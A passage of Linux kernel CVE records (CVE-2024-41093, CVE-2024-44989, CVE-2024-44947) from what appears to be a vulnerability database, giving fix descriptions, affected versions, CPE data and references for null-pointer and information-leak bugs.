              "lessThan": "7f35e01cb0ea4d295f5c067bb5c67dfcddaf05bc",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "6ce0544cabaa608018d5922ab404dc656a9d8447",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "330c8c1453848c04d335bad81371a66710210800",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "dd9ec0ea4cdde0fc48116e63969fc83e81d7ef46",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            },
            {
              "lessThan": "bcfa48ff785bd121316592b131ff6531e3e696bb",
              "status": "affected",
              "version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.2"
            },
            {
              "lessThan": "4.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: avoid using null object of framebuffer\n\nInstead of using state-\u003efb-\u003eobj[0] directly, get object from framebuffer\nby calling drm_gem_fb_get_obj() and return error code when object is\nnull to avoid using null object of framebuffer."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-16T08:02:40.601Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7f35e01cb0ea4d295f5c067bb5c67dfcddaf05bc"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ce0544cabaa608018d5922ab404dc656a9d8447"
        },
        {
          "url": "https://git.kernel.org/stable/c/330c8c1453848c04d335bad81371a66710210800"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd9ec0ea4cdde0fc48116e63969fc83e81d7ef46"
        },
        {
          "url": "https://git.kernel.org/stable/c/bcfa48ff785bd121316592b131ff6531e3e696bb"
        }
      ],
      "title": "drm/amdgpu: avoid using null object of framebuffer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41093",
    "datePublished": "2024-07-29T15:48:06.686Z",
    "dateReserved": "2024-07-12T12:17:45.636Z",
    "dateUpdated": "2025-11-03T22:00:50.813Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44989 (GCVE-0-2024-44989)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

bonding: fix xfrm real_dev null pointer dereference

Summary

In the Linux kernel, the following vulnerability has been resolved: bonding: fix xfrm real_dev null pointer dereference We shouldn't set real_dev to NULL because packets can be in transit and xfrm might call xdo_dev_offload_ok() in parallel. All callbacks assume real_dev is set. Example trace: kernel: BUG: unable to handle page fault for address: 0000000000001030 kernel: bond0: (slave eni0np1): making interface the new active one kernel: #PF: supervisor write access in kernel mode kernel: #PF: error_code(0x0002) - not-present page kernel: PGD 0 P4D 0 kernel: Oops: 0002 [#1] PREEMPT SMP kernel: CPU: 4 PID: 2237 Comm: ping Not tainted 6.7.7+ #12 kernel: Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014 kernel: RIP: 0010:nsim_ipsec_offload_ok+0xc/0x20 [netdevsim] kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA kernel: Code: e0 0f 0b 48 83 7f 38 00 74 de 0f 0b 48 8b 47 08 48 8b 37 48 8b 78 40 e9 b2 e5 9a d7 66 90 0f 1f 44 00 00 48 8b 86 80 02 00 00 <83> 80 30 10 00 00 01 b8 01 00 00 00 c3 0f 1f 80 00 00 00 00 0f 1f kernel: bond0: (slave eni0np1): making interface the new active one kernel: RSP: 0018:ffffabde81553b98 EFLAGS: 00010246 kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA kernel: kernel: RAX: 0000000000000000 RBX: ffff9eb404e74900 RCX: ffff9eb403d97c60 kernel: RDX: ffffffffc090de10 RSI: ffff9eb404e74900 RDI: ffff9eb3c5de9e00 kernel: RBP: ffff9eb3c0a42000 R08: 0000000000000010 R09: 0000000000000014 kernel: R10: 7974203030303030 R11: 3030303030303030 R12: 0000000000000000 kernel: R13: ffff9eb3c5de9e00 R14: ffffabde81553cc8 R15: ffff9eb404c53000 kernel: FS: 00007f2a77a3ad00(0000) GS:ffff9eb43bd00000(0000) knlGS:0000000000000000 kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 kernel: CR2: 0000000000001030 CR3: 00000001122ab000 CR4: 0000000000350ef0 kernel: bond0: (slave eni0np1): making interface the new active one kernel: Call Trace: kernel: <TASK> kernel: ? __die+0x1f/0x60 kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA kernel: ? page_fault_oops+0x142/0x4c0 kernel: ? do_user_addr_fault+0x65/0x670 kernel: ? kvm_read_and_reset_apf_flags+0x3b/0x50 kernel: bond0: (slave eni0np1): making interface the new active one kernel: ? exc_page_fault+0x7b/0x180 kernel: ? asm_exc_page_fault+0x22/0x30 kernel: ? nsim_bpf_uninit+0x50/0x50 [netdevsim] kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA kernel: ? nsim_ipsec_offload_ok+0xc/0x20 [netdevsim] kernel: bond0: (slave eni0np1): making interface the new active one kernel: bond_ipsec_offload_ok+0x7b/0x90 [bonding] kernel: xfrm_output+0x61/0x3b0 kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA kernel: ip_push_pending_frames+0x56/0x80

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/21816b696c172c19d…
	https://git.kernel.org/stable/c/2f72c6a66bcd7e018…
	https://git.kernel.org/stable/c/7fa9243391ad2afe7…
	https://git.kernel.org/stable/c/4582d4ff413a07d4e…
	https://git.kernel.org/stable/c/89fc1dca79db5c3e7…
	https://git.kernel.org/stable/c/f8cde9805981c50d0…

Impacted products

Vendor

Product

Version

Linux

Affected: 18cb261afd7bf50134e5ccacc5ec91ea16efadd4 , < 21816b696c172c19d53a30d45ee005cce246ed21 (git)
Affected: 18cb261afd7bf50134e5ccacc5ec91ea16efadd4 , < 2f72c6a66bcd7e0187ec085237fee5db27145294 (git)
Affected: 18cb261afd7bf50134e5ccacc5ec91ea16efadd4 , < 7fa9243391ad2afe798ef4ea2e2851947b95754f (git)
Affected: 18cb261afd7bf50134e5ccacc5ec91ea16efadd4 , < 4582d4ff413a07d4ed8a4823c652dc5207760548 (git)
Affected: 18cb261afd7bf50134e5ccacc5ec91ea16efadd4 , < 89fc1dca79db5c3e7a2d589ecbf8a3661c65f436 (git)
Affected: 18cb261afd7bf50134e5ccacc5ec91ea16efadd4 , < f8cde9805981c50d0c029063dc7d82821806fc44 (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44989",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-04T20:19:50.219529Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-04T20:20:52.769Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:43.608Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/bonding/bond_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "21816b696c172c19d53a30d45ee005cce246ed21",
              "status": "affected",
              "version": "18cb261afd7bf50134e5ccacc5ec91ea16efadd4",
              "versionType": "git"
            },
            {
              "lessThan": "2f72c6a66bcd7e0187ec085237fee5db27145294",
              "status": "affected",
              "version": "18cb261afd7bf50134e5ccacc5ec91ea16efadd4",
              "versionType": "git"
            },
            {
              "lessThan": "7fa9243391ad2afe798ef4ea2e2851947b95754f",
              "status": "affected",
              "version": "18cb261afd7bf50134e5ccacc5ec91ea16efadd4",
              "versionType": "git"
            },
            {
              "lessThan": "4582d4ff413a07d4ed8a4823c652dc5207760548",
              "status": "affected",
              "version": "18cb261afd7bf50134e5ccacc5ec91ea16efadd4",
              "versionType": "git"
            },
            {
              "lessThan": "89fc1dca79db5c3e7a2d589ecbf8a3661c65f436",
              "status": "affected",
              "version": "18cb261afd7bf50134e5ccacc5ec91ea16efadd4",
              "versionType": "git"
            },
            {
              "lessThan": "f8cde9805981c50d0c029063dc7d82821806fc44",
              "status": "affected",
              "version": "18cb261afd7bf50134e5ccacc5ec91ea16efadd4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/bonding/bond_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: fix xfrm real_dev null pointer dereference\n\nWe shouldn\u0027t set real_dev to NULL because packets can be in transit and\nxfrm might call xdo_dev_offload_ok() in parallel. All callbacks assume\nreal_dev is set.\n\n Example trace:\n kernel: BUG: unable to handle page fault for address: 0000000000001030\n kernel: bond0: (slave eni0np1): making interface the new active one\n kernel: #PF: supervisor write access in kernel mode\n kernel: #PF: error_code(0x0002) - not-present page\n kernel: PGD 0 P4D 0\n kernel: Oops: 0002 [#1] PREEMPT SMP\n kernel: CPU: 4 PID: 2237 Comm: ping Not tainted 6.7.7+ #12\n kernel: Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\n kernel: RIP: 0010:nsim_ipsec_offload_ok+0xc/0x20 [netdevsim]\n kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA\n kernel: Code: e0 0f 0b 48 83 7f 38 00 74 de 0f 0b 48 8b 47 08 48 8b 37 48 8b 78 40 e9 b2 e5 9a d7 66 90 0f 1f 44 00 00 48 8b 86 80 02 00 00 \u003c83\u003e 80 30 10 00 00 01 b8 01 00 00 00 c3 0f 1f 80 00 00 00 00 0f 1f\n kernel: bond0: (slave eni0np1): making interface the new active one\n kernel: RSP: 0018:ffffabde81553b98 EFLAGS: 00010246\n kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA\n kernel:\n kernel: RAX: 0000000000000000 RBX: ffff9eb404e74900 RCX: ffff9eb403d97c60\n kernel: RDX: ffffffffc090de10 RSI: ffff9eb404e74900 RDI: ffff9eb3c5de9e00\n kernel: RBP: ffff9eb3c0a42000 R08: 0000000000000010 R09: 0000000000000014\n kernel: R10: 7974203030303030 R11: 3030303030303030 R12: 0000000000000000\n kernel: R13: ffff9eb3c5de9e00 R14: ffffabde81553cc8 R15: ffff9eb404c53000\n kernel: FS:  00007f2a77a3ad00(0000) GS:ffff9eb43bd00000(0000) knlGS:0000000000000000\n kernel: CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n kernel: CR2: 0000000000001030 CR3: 00000001122ab000 CR4: 0000000000350ef0\n kernel: bond0: (slave eni0np1): making interface the new active one\n kernel: Call Trace:\n kernel:  \u003cTASK\u003e\n kernel:  ? __die+0x1f/0x60\n kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA\n kernel:  ? page_fault_oops+0x142/0x4c0\n kernel:  ? do_user_addr_fault+0x65/0x670\n kernel:  ? kvm_read_and_reset_apf_flags+0x3b/0x50\n kernel: bond0: (slave eni0np1): making interface the new active one\n kernel:  ? exc_page_fault+0x7b/0x180\n kernel:  ? asm_exc_page_fault+0x22/0x30\n kernel:  ? nsim_bpf_uninit+0x50/0x50 [netdevsim]\n kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA\n kernel:  ? nsim_ipsec_offload_ok+0xc/0x20 [netdevsim]\n kernel: bond0: (slave eni0np1): making interface the new active one\n kernel:  bond_ipsec_offload_ok+0x7b/0x90 [bonding]\n kernel:  xfrm_output+0x61/0x3b0\n kernel: bond0: (slave eni0np1): bond_ipsec_add_sa_all: failed to add SA\n kernel:  ip_push_pending_frames+0x56/0x80"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:32.250Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/21816b696c172c19d53a30d45ee005cce246ed21"
        },
        {
          "url": "https://git.kernel.org/stable/c/2f72c6a66bcd7e0187ec085237fee5db27145294"
        },
        {
          "url": "https://git.kernel.org/stable/c/7fa9243391ad2afe798ef4ea2e2851947b95754f"
        },
        {
          "url": "https://git.kernel.org/stable/c/4582d4ff413a07d4ed8a4823c652dc5207760548"
        },
        {
          "url": "https://git.kernel.org/stable/c/89fc1dca79db5c3e7a2d589ecbf8a3661c65f436"
        },
        {
          "url": "https://git.kernel.org/stable/c/f8cde9805981c50d0c029063dc7d82821806fc44"
        }
      ],
      "title": "bonding: fix xfrm real_dev null pointer dereference",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44989",
    "datePublished": "2024-09-04T19:54:36.858Z",
    "dateReserved": "2024-08-21T05:34:56.671Z",
    "dateUpdated": "2025-11-03T22:14:43.608Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44947 (GCVE-0-2024-44947)

Vulnerability from cvelistv5 – Published: 2024-09-02 17:36 – Updated: 2025-11-03 22:13

Title

fuse: Initialize beyond-EOF page contents before setting uptodate

Summary

In the Linux kernel, the following vulnerability has been resolved: fuse: Initialize beyond-EOF page contents before setting uptodate fuse_notify_store(), unlike fuse_do_readpage(), does not enable page zeroing (because it can be used to change partial page contents). So fuse_notify_store() must be more careful to fully initialize page contents (including parts of the page that are beyond end-of-file) before marking the page uptodate. The current code can leave beyond-EOF page contents uninitialized, which makes these uninitialized page contents visible to userspace via mmap(). This is an information leak, but only affects systems which do not enable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the corresponding kernel command line parameter).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/49934861514d36d09…
	https://git.kernel.org/stable/c/33168db352c7b56ae…
	https://git.kernel.org/stable/c/4690e2171f651e2b4…
	https://git.kernel.org/stable/c/8c78303eafbf85a72…
	https://git.kernel.org/stable/c/831433527773e665b…
	https://git.kernel.org/stable/c/ac42e0f0eb66af966…
	https://git.kernel.org/stable/c/18a067240817bee8a…
	https://git.kernel.org/stable/c/3c0da3d163eb32f1f…
	https://project-zero.issues.chromium.org/issues/4…

Impacted products

Vendor

Product

Version

Linux

Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < 49934861514d36d0995be8e81bb3312a499d8d9a (git)
Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < 33168db352c7b56ae18aa55c2cae1a1c5905d30e (git)
Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < 4690e2171f651e2b415e3941ce17f2f7b813aff6 (git)
Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < 8c78303eafbf85a728dd84d1750e89240c677dd9 (git)
Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < 831433527773e665bdb635ab5783d0b95d1246f4 (git)
Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < ac42e0f0eb66af966015ee33fd355bc6f5d80cd6 (git)
Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < 18a067240817bee8a9360539af5d79a4bf5398a5 (git)
Affected: a1d75f258230b75d46aecdf28b2e732413028863 , < 3c0da3d163eb32f1f91891efaade027fa9b245b9 (git)

Linux

Affected: 2.6.36
Unaffected: 0 , < 2.6.36 (semver)
Unaffected: 4.19.321 , ≤ 4.19.* (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44947",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:27:03.431067Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:15.852Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:13:54.619Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/fuse/dev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "49934861514d36d0995be8e81bb3312a499d8d9a",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            },
            {
              "lessThan": "33168db352c7b56ae18aa55c2cae1a1c5905d30e",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            },
            {
              "lessThan": "4690e2171f651e2b415e3941ce17f2f7b813aff6",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            },
            {
              "lessThan": "8c78303eafbf85a728dd84d1750e89240c677dd9",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            },
            {
              "lessThan": "831433527773e665bdb635ab5783d0b95d1246f4",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            },
            {
              "lessThan": "ac42e0f0eb66af966015ee33fd355bc6f5d80cd6",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            },
            {
              "lessThan": "18a067240817bee8a9360539af5d79a4bf5398a5",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            },
            {
              "lessThan": "3c0da3d163eb32f1f91891efaade027fa9b245b9",
              "status": "affected",
              "version": "a1d75f258230b75d46aecdf28b2e732413028863",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/fuse/dev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.36"
            },
            {
              "lessThan": "2.6.36",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.321",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.321",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: Initialize beyond-EOF page contents before setting uptodate\n\nfuse_notify_store(), unlike fuse_do_readpage(), does not enable page\nzeroing (because it can be used to change partial page contents).\n\nSo fuse_notify_store() must be more careful to fully initialize page\ncontents (including parts of the page that are beyond end-of-file)\nbefore marking the page uptodate.\n\nThe current code can leave beyond-EOF page contents uninitialized, which\nmakes these uninitialized page contents visible to userspace via mmap().\n\nThis is an information leak, but only affects systems which do not\nenable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the\ncorresponding kernel command line parameter)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:29:35.643Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/49934861514d36d0995be8e81bb3312a499d8d9a"
        },
        {
          "url": "https://git.kernel.org/stable/c/33168db352c7b56ae18aa55c2cae1a1c5905d30e"
        },
        {
          "url": "https://git.kernel.org/stable/c/4690e2171f651e2b415e3941ce17f2f7b813aff6"
        },
        {
          "url": "https://git.kernel.org/stable/c/8c78303eafbf85a728dd84d1750e89240c677dd9"
        },
        {
          "url": "https://git.kernel.org/stable/c/831433527773e665bdb635ab5783d0b95d1246f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/ac42e0f0eb66af966015ee33fd355bc6f5d80cd6"
        },
        {
          "url": "https://git.kernel.org/stable/c/18a067240817bee8a9360539af5d79a4bf5398a5"
        },
        {
